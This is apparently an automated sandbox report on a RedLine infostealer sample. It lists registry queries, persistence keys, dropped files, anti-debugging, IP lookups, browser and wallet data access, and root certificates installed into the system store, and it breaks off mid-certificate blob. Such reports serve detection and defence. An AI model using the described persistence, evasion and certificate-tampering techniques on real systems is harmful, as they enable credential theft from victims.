redline | 093c40a96a55be0cc76dd3f234eebc8e66f453626f0d217fce4bb91d5e5afa5c

System Information Discovery

Processes:

3628899.exe4074099.exe79923107550.exe55823358473.exe7741122.scrMon1160373b3b6ac3f.exe6496633.scr

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3628899.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4074099.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	79923107550.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	55823358473.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	79923107550.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7741122.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	55823358473.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Mon1160373b3b6ac3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3628899.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6496633.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7741122.scr
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4074099.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Mon1160373b3b6ac3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6496633.scr

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Mon1133139d83b18.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Mon1133139d83b18.exe

Loads dropped DLL 64 IoCs

Processes:

295b842a1a8473e51468fed24d1527cd.exesetup_install.execmd.execmd.execmd.execmd.exeMon11c20bd59014d.execmd.execmd.execmd.execmd.exeMon112a4b301b.execmd.exeMon11bddd2ee4744bdc.execmd.execmd.exeMon117107f765b140f6f.exeMon1160373b3b6ac3f.execmd.execmd.exeMon1133139d83b18.exeMon114596ddbd42f8.exeMon1164bf13c51f2c.exeMon112a4b301b.tmpWerFault.exeLzmwAqmV.exeudptest.exesfx_123_206.exe

pid	process
1224	295b842a1a8473e51468fed24d1527cd.exe
1224	295b842a1a8473e51468fed24d1527cd.exe
1224	295b842a1a8473e51468fed24d1527cd.exe
1672	setup_install.exe
1672	setup_install.exe
1672	setup_install.exe
1672	setup_install.exe
1672	setup_install.exe
1672	setup_install.exe
1672	setup_install.exe
1672	setup_install.exe
592	cmd.exe
1472	cmd.exe
576	cmd.exe
576	cmd.exe
472	cmd.exe
1892	Mon11c20bd59014d.exe
1892	Mon11c20bd59014d.exe
912	cmd.exe
1116	cmd.exe
656	cmd.exe
1208	cmd.exe
1208	cmd.exe
1780	Mon112a4b301b.exe
1780	Mon112a4b301b.exe
840	cmd.exe
1008	Mon11bddd2ee4744bdc.exe
1008	Mon11bddd2ee4744bdc.exe
616	cmd.exe
616	cmd.exe
1160	cmd.exe
2040	Mon117107f765b140f6f.exe
2040	Mon117107f765b140f6f.exe
836	Mon1160373b3b6ac3f.exe
836	Mon1160373b3b6ac3f.exe
1264	cmd.exe
2032	cmd.exe
2032	cmd.exe
596	Mon1133139d83b18.exe
596	Mon1133139d83b18.exe
584	Mon114596ddbd42f8.exe
584	Mon114596ddbd42f8.exe
1392	Mon1164bf13c51f2c.exe
1392	Mon1164bf13c51f2c.exe
1780	Mon112a4b301b.exe
1188	Mon112a4b301b.tmp
1188	Mon112a4b301b.tmp
1188	Mon112a4b301b.tmp
1188	Mon112a4b301b.tmp
2380	WerFault.exe
2380	WerFault.exe
2380	WerFault.exe
2536	LzmwAqmV.exe
2536	LzmwAqmV.exe
2536	LzmwAqmV.exe
2536	LzmwAqmV.exe
2536	LzmwAqmV.exe
2536	LzmwAqmV.exe
2536	LzmwAqmV.exe
2380	WerFault.exe
2872	udptest.exe
2872	udptest.exe
2536	LzmwAqmV.exe
2960	sfx_123_206.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1160373b3b6ac3f.exe	themida
\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1160373b3b6ac3f.exe	themida
C:\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1160373b3b6ac3f.exe	themida
\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1160373b3b6ac3f.exe	themida
\Users\Admin\AppData\Local\Temp\7zS8C476BB2\Mon1160373b3b6ac3f.exe	themida
behavioral1/memory/836-190-0x0000000000180000-0x0000000000181000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Ze2ro.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows NT\\Tutepeqezhe.exe\""	Ze2ro.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

Processes:

4074099.exe55823358473.exe79923107550.exe3628899.exeMon1160373b3b6ac3f.exe6496633.scr7741122.scr

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4074099.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	55823358473.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	79923107550.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3628899.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Mon1160373b3b6ac3f.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6496633.scr
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7741122.scr

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

263 ipinfo.io
264 ipinfo.io
8 ip-api.com
122 ipinfo.io
123 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

Mon1160373b3b6ac3f.exe6496633.scr7741122.scr4074099.exe55823358473.exe79923107550.exe3628899.exe

pid process

836 Mon1160373b3b6ac3f.exe
2952 6496633.scr
2124 7741122.scr
3624 4074099.exe
3504 55823358473.exe
3528 79923107550.exe
472 3628899.exe

flow	ioc
263	ipinfo.io
264	ipinfo.io
8	ip-api.com
122	ipinfo.io
123	ipinfo.io

Suspicious use of SetThreadContext 3 IoCs

Processes:

3467698.scr7514614.exeGarbage Cleaner.exe

description	pid	process	target process
PID 3004 set thread context of 1220	3004	3467698.scr	3467698.scr
PID 2584 set thread context of 3340	2584	7514614.exe	7514614.exe
PID 2980 set thread context of 3736	2980	Garbage Cleaner.exe	Garbage Cleaner.exe

Drops file in Program Files directory 64 IoCs

Processes:

autosubplayer.exeZe2ro.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlc.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist_jstree.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac	autosubplayer.exe
File created	C:\Program Files (x86)\Windows NT\Tutepeqezhe.exe	Ze2ro.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-OR22B.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll	autosubplayer.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\regstr	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	autosubplayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll	autosubplayer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2380	1392	WerFault.exe	Mon1164bf13c51f2c.exe
1696	3004	WerFault.exe	3467698.scr
2632	2584	WerFault.exe	7514614.exe
1700	3796	WerFault.exe	AZzSCYJmc7g_b1Ack7OZG0sH.exe
2848	472	WerFault.exe	7R6XF3uBM9y_UPeutPhPA5Ik.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Mon117107f765b140f6f.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon117107f765b140f6f.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon117107f765b140f6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon117107f765b140f6f.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

42898339440.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	42898339440.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	42898339440.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3612 schtasks.exe
1772 schtasks.exe
3452 schtasks.exe
2636 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2768 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2412 taskkill.exe
3492 taskkill.exe
1904 taskkill.exe
3820 taskkill.exe

pid	process
3612	schtasks.exe
1772	schtasks.exe
3452	schtasks.exe
2636	schtasks.exe

pid	process
2768	timeout.exe

pid	process
2412	taskkill.exe
3492	taskkill.exe
1904	taskkill.exe
3820	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{800FF861-1B2C-11EC-B258-C62B5981BBF4} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Mon11cce54fe7cc83fa3.exeMon11bddd2ee4744bdc.exeMon11c710f55e48b36.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Mon11cce54fe7cc83fa3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Mon11cce54fe7cc83fa3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Mon11bddd2ee4744bdc.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Mon11bddd2ee4744bdc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Mon11c710f55e48b36.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b974